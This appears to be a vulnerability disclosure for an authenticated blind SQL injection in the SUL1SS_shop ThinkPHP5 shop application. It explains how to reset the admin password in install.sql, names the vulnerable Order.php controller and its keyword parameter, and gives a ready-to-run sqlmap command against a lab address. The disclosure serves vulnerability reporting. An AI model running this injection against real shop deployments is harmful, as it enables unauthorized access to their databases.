SQLi Vulnerability in SUL1SS_shop
A shop application developed by ThinkPHP5
Download and deploy in the web directory, and import the database file (install.sql)
Before starting, if you need to install the system, you may need to modify the database file (install.sql) to allow you to log in.
'admin', 'f374baf63f70a5c2c4d172a0a6e37897', 'U66yPU04'
modify it to
'admin', 'a7da35830936caa0258da1c26c42d6ff', 'lVRVVp9g'
In this way, the password becomes 123456, and you can start testing the vulnerability.
(Since this vulnerability exists in the background, it cannot be exploited if you do not know the password.)
Visit and log in to the background, for example: http://192.168.159.133:8080/index.php/admin/login/index.html
Vulnerable file: application\merch\controller\Order.php
The $keyword variable is passed in by the GET method. When other variables meet the judgment conditions, it can finally be spliced into the SQL statement to cause SQL injection.
The resulting SQL statement is executed, resulting in blind injection.
sqlmap payload(Replace the cookie with your own):
sqlmap -u "http://192.168.159.133:8080/index.php/admin/order/olist_all.html?paytype=&searchtime=&time%5Bstart%5D=2023-02-04+15%3A02&time%5Bend%5D=2023-03-04+15%3A02&searchfield=ordersn&keyword=1*&export=0" --cookie="thinkphp_show_page_trace=0|0; login%40=60ae28k2vl20sg2gi9reljav61" --current-user